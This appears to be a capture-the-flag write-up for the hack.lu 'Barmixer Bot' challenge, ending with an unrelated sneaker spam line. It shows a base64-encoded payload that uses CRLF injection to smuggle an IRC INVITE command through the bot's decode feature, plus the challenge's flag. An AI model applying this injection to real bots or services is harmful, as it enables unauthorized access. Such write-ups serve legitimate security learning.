Skip to content Skip to navigation

Barmixer Bot (misc 200)



There's a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it's involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!


We deal with IRC-bot named barmixer-bot in this task. It can understand some commands that starts with "!" symbol.

Let our username is "hacker". First let's ask bot for help:

hacker: !help
barmixer-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

So what status is it?

hacker: !status
barmixer-bot: My name is barmixer-bot, my uptime is 1 hours 55 minutes and 37 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, ...

It looks like bot is member of #hacklu-secret-channel which most likely contain a flag. But this channel require an invitation to get access.

Other commands are not very interesting. Some of them bot performs an actions such as base64 decoding / enciding, rot13. Example:

hacker: !base64 hello 
barmixer-bot: aGVsbG8=

hacker: !base64d aGVsbG8= 
barmixer-bot: hello

We know about IRC-commands and specifically about INVITE command. Maybe we can force bot to invite us to secret channel?

Delimeter between IRC-commands is newline so let's generate our shell:

>>> import base64
>>> c = '1\r\nINVITE hacker #hacklu-secret-channel'
>>> print base64.b64encode(c)

And let bot decode it for us:

hacker: !base64d MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs

Now go to #hacklu-secret-channel and voila! We are inside! Channel topic was "FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH".

latest Nike Sneakers | Best Nike Air Max Shoes 2021 , Air Max Releases and Deals